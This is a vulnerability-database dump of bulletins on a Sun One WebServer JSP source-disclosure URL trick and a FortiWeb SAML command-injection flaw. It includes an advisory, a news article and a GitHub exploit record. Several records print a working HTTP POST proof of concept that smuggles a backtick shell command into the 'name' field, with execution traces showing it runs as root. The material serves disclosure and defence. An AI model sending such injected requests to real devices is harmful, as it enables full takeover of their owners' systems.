{"id": "SECURITYVULNS:DOC:22123", "bulletinFamily": "software", "title": "Sun One WebServer 6.1 JSP Source Viewing vulnerability", "description": "Sun One WebServer 6.1 JSP Source Viewing vulnerability\r\n\r\nSystem: Sun-ONE-Web-Server/6.1, Windows Server 2003\r\n\r\nSunOne WebServer (formerly Netscape Enterprise Server, iPlanet) on Windows Systems lets remote people disclose\r\nJSP Source code.\r\n\r\nA normal URL would look like:\r\n\r\nhttp://server/hello.jsp\r\n\r\nTo disclose the contents including source code of a JSP file:\r\n\r\nhttp://server/hello.jsp::$DATA\r\n\r\nBest Regards,\r\n\r\nNikolaos Rangos\r\n\r\n", "published": "2009-07-05T00:00:00", "modified": "2009-07-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22123", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:30", "edition": 1, "viewCount": 8, "enchantments": {"score": {"value": 2.9, "vector": "NONE", "modified": "2018-08-31T11:10:30", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["EULEROS_SA-2020-1498.NASL", "EULEROS_SA-2020-1457.NASL", "EULEROS_SA-2020-1496.NASL", "EULEROS_SA-2020-1477.NASL", "EULEROS_SA-2020-1491.NASL", "EULEROS_SA-2020-1494.NASL", "EULEROS_SA-2020-1483.NASL", "EULEROS_SA-2020-1489.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201494", "OPENVAS:1361412562311220201431", "OPENVAS:1361412562311220201489", "OPENVAS:1361412562311220201457", "OPENVAS:1361412562311220201477", "OPENVAS:1361412562311220201400", "OPENVAS:1361412562311220201491", "OPENVAS:1361412562311220201476", "OPENVAS:1361412562311220201430", "OPENVAS:1361412562311220201473"]}], "modified": "2018-08-31T11:10:30", "rev": 2}, "vulnersScore": 2.9}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"seebug": [{"id": "SSV:99335", "hash": "0728d77749b477ef43b839c3a4018228", "type": "seebug", "bulletinFamily": "exploit", "title": "Fortinet FortiWeb \u6388\u6743\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2021-22123\uff09", "description": "# Fortinet FortiWeb OS Command Injection\n\n * Aug 17, 2021\n\n * 5 min read\n\n \n\nAn OS command injection vulnerability in FortiWeb's management interface\n(version 6.3.11 and prior) can allow a remote, authenticated attacker to\nexecute arbitrary commands on the system, via the SAML server configuration\npage. This is an instance of [ CWE-78: Improper Neutralization of Special\nElements used in an OS Command ('OS Command\nInjection')](https://cwe.mitre.org/data/definitions/78.html) and has a CVSSv3\nbase score of [8.7](https://nvd.nist.gov/vuln-\nmetrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N&version=3.1).\nThis vulnerability appears to be related to CVE-2021-22123, which was\naddressed in [FG-IR-20-120](https://www.fortiguard.com/psirt/FG-IR-20-120).\n\n## Product Description\n\nFortinet FortiWeb is a web application firewall (WAF), designed to catch both\nknown and unknown exploits targeting the protected web applications before\nthey have a chance to execute. More about FortiWeb can be found at [the\nvendor's website](https://www.fortinet.com/products/web-application-\nfirewall/fortiweb).\n\n## Credit\n\nThis issue was discovered by researcher [William\nVu](https://twitter.com/wvuuuuuuuuuuuuu) of Rapid7. It is being disclosed in\naccordance with Rapid7's [vulnerability disclosure\npolicy](https://www.rapid7.com/disclosure/).\n\n## Exploitation\n\nAn attacker, who is first authenticated to the management interface of the\nFortiWeb device, can smuggle commands using backticks in the \"Name\" field of\nthe SAML Server configuration page. These commands are then executed as the\nroot user of the underlying operating system. The affected code is noted\nbelow:\n\n```\nint move_metafile(char *path,char *name)\n{\nint iVar1;\nchar buf [512];\nint nret;\nsnprintf(buf,0x200,\"%s/%s\",\"/data/etc/saml/shibboleth/service_providers\",name);\niVar1 = access(buf,0);\nif (iVar1 != 0) {\nsnprintf(buf,0x200,\"mkdir %s/%s\",\"/data/etc/saml/shibboleth/service_providers\",name);\niVar1 = system(buf);\nif (iVar1 != 0) {\nreturn iVar1;\n}\n}\nsnprintf(buf,0x200,\"cp %s %s/%s/%s.%s\",path,\"/data/etc/saml/shibboleth/service_providers\",name,\n\"Metadata\",&DAT_00212758);\niVar1 = system(buf);\nreturn iVar1;\n}\n```\n\n\n\nThe HTTP POST request and response below demonstrates an example exploit of this vulnerability:\n\n ```\nPOST /api/v2.0/user/remoteserver.saml HTTP/1.1\nHost: [redacted]\nCookie: [redacted]\nUser-Agent: [redacted]\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://[redacted]/root/user/remote-user/saml-user/\nX-Csrftoken: 814940160\nContent-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412\nContent-Length: 3068\nOrigin: https://[redacted]\nDnt: 1\nTe: trailers\nConnection: close\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"q_type\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"name\"\n`touch /tmp/vulnerable`\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"entityID\"\ntest\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"service-path\"\n/saml.sso\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"session-lifetime\"\n8\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"session-timeout\"\n30\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-bind\"\npost\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-bind_val\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-path\"\n/SAML2/POST\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-bind\"\npost\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-bind_val\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-path\"\n/SLO/POST\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"flag\"\n0\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"enforce-signing\"\ndisable\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"enforce-signing_val\"\n0\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"metafile\"; filename=\"test.xml\"\nContent-Type: text/xml\n<?xml version=\"1.0\"?>\n<md:EntityDescriptor xmlns:md=\"urn:oasis:names:tc:SAML:2.0:metadata\" validUntil=\"2021-06-12T16:54:31Z\" cacheDuration=\"PT1623948871S\" entityID=\"test\">\n<md:IDPSSODescriptor WantAuthnRequestsSigned=\"false\" protocolSupportEnumeration=\"urn:oasis:names:tc:SAML:2.0:protocol\">\n<md:KeyDescriptor use=\"signing\">\n<ds:KeyInfo xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n<ds:X509Data>\n<ds:X509Certificate>test</ds:X509Certificate>\n</ds:X509Data>\n</ds:KeyInfo>\n</md:KeyDescriptor>\n<md:KeyDescriptor use=\"encryption\">\n<ds:KeyInfo xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n<ds:X509Data>\n<ds:X509Certificate>test</ds:X509Certificate>\n</ds:X509Data>\n</ds:KeyInfo>\n</md:KeyDescriptor>\n<md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat>\n<md:SingleSignOnService Binding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect\" Location=\"test\"/>\n</md:IDPSSODescriptor>\n</md:EntityDescriptor>\n-----------------------------94351131111899571381631694412--\nHTTP/1.1 500 Internal Server Error\nDate: Thu, 10 Jun 2021 11:59:45 GMT\nCache-Control: no-cache, no-store, must-revalidate\nPragma: no-cache\nSet-Cookie: [redacted]\nX-Frame-Options: SAMEORIGIN\nX-XSS-Protection: 1; mode=block\nContent-Security-Policy: frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nContent-Length: 20\nStrict-Transport-Security: max-age=63072000\nConnection: close\nContent-Type: application/json\n{\"errcode\": \"-651\"}\n ```\n\n\n\n\nNote the smuggled 'touch' command is concatenated in the mkdir shell command:\n\n```\n[pid 12867] execve(\"/migadmin/cgi-bin/fwbcgi\", [\"/migadmin/cgi-bin/fwbcgi\"], 0x55bb0395bf00 /* 42 vars */) = 0\n[pid 13934] execve(\"/bin/sh\", [\"sh\", \"-c\", \"mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`\"], 0x7fff56b1c608 /* 42 vars */) = 0\n[pid 13935] execve(\"/bin/touch\", [\"touch\", \"/tmp/vulnerable\"], 0x55774aa30bf8 /* 44 vars */) = 0\n[pid 13936] execve(\"/bin/mkdir\", [\"mkdir\", \"/data/etc/saml/shibboleth/service_providers/\"], 0x55774aa30be8 /* 44 vars */) = 0\n```\n\n\n\n\nFinally, the results of the 'touch' command can be seen on the local command\nline of the FortiWeb device:\n\n```\n/# ls -l /tmp/vulnerable\n-rw-r--r-- 1 root 0 0 Jun 10 11:59 /tmp/vulnerable\n/#\n```\n\n\n\n\n## Impact\n\nAn attacker can leverage this vulnerability to take complete control of the\naffected device, with the highest possible privileges. They might install a\npersistent shell, crypto mining software, or other malicious software. In the\nunlikely event the management interface is exposed to the internet, they could\nuse the compromised platform to reach into the affected network beyond the\nDMZ. Note, though, Rapid7 researchers were only able to identify less than\nthree hundred total of these devices that appear to be exposing their\nmanagement interfaces to the general internet.\n\nNote that while authentication is a prerequisite for this exploit, this\nvulnerability could be combined with another authentication bypass issue, such\nas [CVE-2020-29015](https://attackerkb.com/topics/n8OdPI11Nx/cve-2020-29015).\n\n## Remediation\n\nIn the absence of a patch, users are advised to disable the FortiWeb device's\nmanagement interface from untrusted networks, which would include the\ninternet. Generally speaking, management interfaces for devices like FortiWeb\nshould not be exposed directly to the internet anyway -- instead, they should\nbe reachable only via trusted, internal networks, or over a secure VPN\nconnection.\n\n## Disclosure Timeline\n\n * June, 2021: Issue discovered and validated by William Vu of Rapid7\n * Thu, Jun 10, 2021: Initial disclosure to the vendor via their [PSIRT Contact Form](https://www.fortiguard.com/faq/psirt-contact)\n * Fri, Jun 11, 2021: Acknowledged by the vendor (ticket 132097)\n * Wed, Aug 11, 2021: Follow up with the vendor\n * Tue, Aug 17, 2021: Public disclosure via [this post](https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/)\n * Tue, Aug 17, 2021: Vendor indicated that Fortiweb 6.4.1 is expected to include a fix, and will be released at the end of August", "published": "2021-08-19T00:00:00", "modified": "2021-08-19T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.seebug.org/vuldb/ssvid-99335", "reporter": "Knownsec", "references": [], "cvelist": ["CVE-2020-29015", "CVE-2021-22123"], "immutableFields": [], "lastseen": "2021-08-20T03:36:27", "history": [], "viewCount": 165, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-22123", "CVE-2020-29015"]}, {"type": "githubexploit", "idList": ["ED9550C1-0AFC-53DF-9BFA-AA6341B6E5AF"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB"]}, {"type": "threatpost", "idList": ["THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9"]}, {"type": "thn", "idList": ["THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}, {"type": "fortinet", "idList": ["FG-IR-21-116", "FG-IR-20-124", "FG-IR-20-120"]}], "modified": "2021-08-20T03:36:27", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-08-20T03:36:27", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "", "sourceData": "", "status": "cve,details", "_object_type": "robots.models.seebug.SeebugBulletin", "_object_types": ["robots.models.seebug.SeebugBulletin", "robots.models.base.Bulletin"]}], "threatpost": [{"id": "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "hash": "4ae4233f9375e3d2d2d00421d5394db7", "type": "threatpost", "bulletinFamily": "info", "title": "Unpatched Fortinet Bug Allows Firewall Takeovers", "description": "UPDATE\n\nAn unpatched OS command-injection security vulnerability has been disclosed in Fortinet\u2019s web application firewall (WAF) platform, known as FortiWeb. It could allow privilege escalation and full device takeover, researchers said.\n\nFortiWeb is a cybersecurity defense platform, [aimed at](<https://www.fortinet.com/products/web-application-firewall/fortiweb>) protecting business-critical web applications from attacks that target known and unknown vulnerabilities. The firewall has been to keep up with the deployment of new or updated features, or the addition of new web APIs, according to Fortinet.\n\nThe bug (CVE pending) exists in FortiWeb\u2019s management interface (version 6.3.11 and prior), and carries a CVSSv3 base score of 8.7 out of 10, making it high-severity. It can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page, according to Rapid7 researcher William Vu who discovered the bug.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\n\u201cNote that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication-bypass issue, such as [CVE-2020-29015](<https://www.fortiguard.com/psirt/FG-IR-20-124>),\u201d according to a [Tuesday writeup](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) on the issue.\n\nOnce attackers are authenticated to the management interface of the FortiWeb device, they can smuggle commands using backticks in the \u201cName\u201d field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system.\n\n\u201cAn attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\u201d according to the writeup. \u201cThey might install a persistent shell, crypto mining software, or other malicious software.\u201d\n\nThe damage could be worse if the management interface is exposed to the internet: Rapid7 noted that attackers could pivot to the wider network in that case. However, Rapid7 researchers identified less than three hundred appliances that appeared to be doing so.\n\nIn the analysis, Vu provided a proof-of-concept exploit code, which uses an HTTP POST request and response.\n\nIn light of the disclosure, Fortinet has sped up plans to release a fix for the problem with FortiWeb 6.4.1 \u2014 originally planned for the end of August, it will now be available by the end of the week.\n\n\u201cWe are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week,\u201d it said in a statement provided to Threatpost.\n\nThe firm also noted that Rapid7\u2019s disclosure was a bit of a surprise given [vulnerability-disclosure norms](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) in the industry.\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the [Fortinet PSIRT Policy page](<https://www.fortiguard.com/psirt_policy>), which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. As such, we had expected that Rapid7 hold any findings prior to the end of the our [90-day Responsible disclosure window](<https://www.fortiguard.com/zeroday/responsible-disclosure>). We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window.\u201d\n\nFor now, Rapid7 offered straightforward advice:\n\n\u201cIn the absence of a patch, users are advised to disable the FortiWeb device\u2019s management interface from untrusted networks, which would include the internet,\u201d according to Rapid7. \u201cGenerally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway \u2014 instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.\u201d\n\nThe Rapid7 researchers said that the vulnerability appears to be related to [CVE-2021-22123](<https://www.fortiguard.com/psirt/FG-IR-20-120>), which was patched in June.\n\n## **Fortinet: Popular for Exploit**\n\nThe vendor [is no stranger](<https://threatpost.com/fortigate-vpn-default-config-mitm-attacks/159586/>) to cybersecurity bugs in its platforms, and Fortinet\u2019s cybersecurity products are popular as exploitation avenues with cyberattackers, including nation-state actors. Users should prepare to patch quickly.\n\nIn April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) various advanced persistent threats (APTs) were actively exploiting three security vulnerabilities in the Fortinet SSL VPN for espionage. Exploits for CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812 were being used for to gain a foothold within networks before moving laterally and carrying out recon, they warned.\n\nOne of those bugs, a Fortinet vulnerability in FortiOS, [was also seen](<https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/>) being used to deliver a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.\n\n_**This post was updated August 18 at 1:30 p.m. ET with a statement from Fortinet.**_\n", "published": "2021-08-18T12:07:33", "modified": "2021-08-18T12:07:33", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://threatpost.com/unpatched-fortinet-bug-firewall-takeovers/168764/", "reporter": "Tara Seals", "references": ["https://www.fortinet.com/products/web-application-firewall/fortiweb", "https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/", "https://www.fortiguard.com/psirt/FG-IR-20-124", "https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/", "https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/", "https://www.fortiguard.com/psirt_policy", "https://www.fortiguard.com/zeroday/responsible-disclosure", "https://www.fortiguard.com/psirt/FG-IR-20-120", "https://threatpost.com/fortigate-vpn-default-config-mitm-attacks/159586/", "https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/", "https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/"], "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "immutableFields": [], "lastseen": "2021-08-18T20:47:20", "history": [], "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "AKB:91756851-9B25-4801-B911-E3226A0656B5", "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A"]}, {"type": "thn", "idList": ["THN:FCBB400B24C7B24CD6B5136FA8BE38D3", "THN:EAEDDF531EB90375B350E1580DE3DD02", "THN:8483C1B45A5D7BF5D501DE72F5898935", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:FBDAEC0555EDC3089DC0966D121E0BCE", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:C3B82BB0558CF33CFDC326E596AF69C4"]}, {"type": "seebug", "idList": ["SSV:99335"]}, {"type": "cve", "idList": ["CVE-2020-12812", "CVE-2021-22123", "CVE-2020-29015", "CVE-2018-13379", "CVE-2019-5591"]}, {"type": "cisa", "idList": ["CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB", "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "threatpost", "idList": ["THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:663AA4570D9C08DDFFC1ED3DDB1AFD73", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:9A992997C9356F535014808706B602BC", "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-1187"]}, {"type": "fortinet", "idList": ["FG-IR-18-384", "FG-IR-21-116", "FG-IR-20-124", "FG-IR-20-120", "FG-IR-20-233", "FG-IR-19-037", "FG-IR-19-283"]}, {"type": "githubexploit", "idList": ["ED9550C1-0AFC-53DF-9BFA-AA6341B6E5AF"]}, {"type": "nessus", "idList": ["FORTIOS_FG-IR-19-037.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-19-283.NASL"]}, {"type": "kitploit", "idList": ["KITPLOIT:5397133847150975825", "KITPLOIT:3532211766929466258", "KITPLOIT:5563730483162396602", "KITPLOIT:965198862441671998", "KITPLOIT:6516544912632048506", "KITPLOIT:5829195600312197311", "KITPLOIT:2686676167278919598", "KITPLOIT:7070039119688478663", "KITPLOIT:816704453339226193", "KITPLOIT:1244156083583318186", "KITPLOIT:2722328714476257207", "KITPLOIT:763105754466120590", "KITPLOIT:4425790137948714912", "KITPLOIT:119877528847056004", "KITPLOIT:5376485594298165648"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E222442D181419B052AACE6DA4BC8485", "EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208"]}, {"type": "dsquare", "idList": ["E-691"]}, {"type": "zdt", "idList": ["1337DAY-ID-33133", "1337DAY-ID-33134"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154146", "PACKETSTORM:154147"]}, {"type": "exploitdb", "idList": ["EDB-ID:47288", "EDB-ID:47287"]}, {"type": "mssecure", "idList": ["MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8"]}, {"type": "mmpc", "idList": ["MMPC:C0F4687B18D53FB9596AD4FDF77092D8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8"]}], "modified": "2021-08-18T20:47:20", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-08-18T20:47:20", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"]}], "githubexploit": [{"id": "ED9550C1-0AFC-53DF-9BFA-AA6341B6E5AF", "vendorId": null, "hash": "c23ea918e8755ccf2e4b42b7206f47d2", "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for ['CVE-2021-22123']", "description": "<b>[CVE-2021-22123] Fortinet FortiWeb Authenticated OS Command I...", "published": "2021-08-18T10:54:27", "modified": "2021-10-24T06:02:02", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-22123"], "immutableFields": [], "lastseen": "2021-12-01T17:23:38", "history": [{"bulletin": {"id": "ED9550C1-0AFC-53DF-9BFA-AA6341B6E5AF", "vendorId": "GITHUBEXPL:MURATAYDEMIR-CVE-2021-22123", "hash": "3ca65dfd2bae2934609874bb72d79bbf", "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for CVE-2021-22123", "description": "<b>[CVE-2021-22123] Fortinet FortiWeb Authenticated OS Command Injection</b>\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n\n\n\nThe command injection vulnerability in the FortiWeb management interface may allow an authenticated remote attacker to execute arbitrary commands in the system via the SAML server configuration page. Executing commands with maximum privileges will result in the attacker gaining full control over the server. This is an instance of [CWE-78: Improper Neutralization of Special Elements used in an OS Command](https://cwe.mitre.org/data/definitions/78.html) and has a CVSSv3 base score of 8.7. This vulnerability has `CVE-2021-22123` number, which was addressed in [Fortiguard Lab page (FG-IR-20-120)](https://www.fortiguard.com/psirt/FG-IR-20-120)\n\nBasically, SAML stands for Security Assertion Markup Language and it is an XML-based open-standard for transferring identity data between two parties: an identity provider (IdP) and a service provider (SP). It designed to ensure the operation of a Single Sign-On mechanism, which allows you to access various software products using a single identifier.\n\nFortiWeb `all versions prior to 6.3.7` and below are vulnerable to authenticated OS Command Injection vulnerability. Successfully exploitation of this vulnerability may lead to take complete control of the affected device, with the highest possible privileges. They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ.\n\nAn attacker, who is first authenticated to the management interface of the FortiWeb device, can smuggle commands using backticks in the `name` field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system. Vulnerable part of the code is illustrated as below.\n\n```C\nint move_metafile(char * path, char * name) {\n int iVar1;\n char buf[512];\n int nret;\n snprintf(buf, 0x200, \"%s/%s\", \"/data/etc/saml/shibboleth/service_providers\", name);\n iVar1 = access(buf, 0);\n if (iVar1 != 0) {\n snprintf(buf, 0x200, \"mkdir %s/%s\", \"/data/etc/saml/shibboleth/service_providers\", name);\n iVar1 = system(buf);\n if (iVar1 != 0) {\n return iVar1;\n }\n }\n snprintf(buf, 0x200, \"cp %s %s/%s/%s.%s\", path, \"/data/etc/saml/shibboleth/service_providers\", name,\n \"Metadata\", & DAT_00212758);\n iVar1 = system(buf);\n return iVar1;\n}\n```\n\n<b>Proof of Concept (PoC):</b> The following POST request can be used in order to exploit this vulnerability.\n\n```\nPOST /api/v2.0/user/remoteserver.saml HTTP/1.1\nHost: vulnerablehost\nCookie: redacted\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://vulnerablehost/root/user/remote-user/saml-user/\nX-Csrftoken: 814940160\nContent-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412\nContent-Length: 3068\nOrigin: https://vulnerablehost\nDnt: 1\nTe: trailers\nConnection: close\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"q_type\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"name\"\n`touch /tmp/CVE-2021-22123`\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"entityID\"\ntest\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"service-path\"\n/saml.sso\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"session-lifetime\"\n8\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; 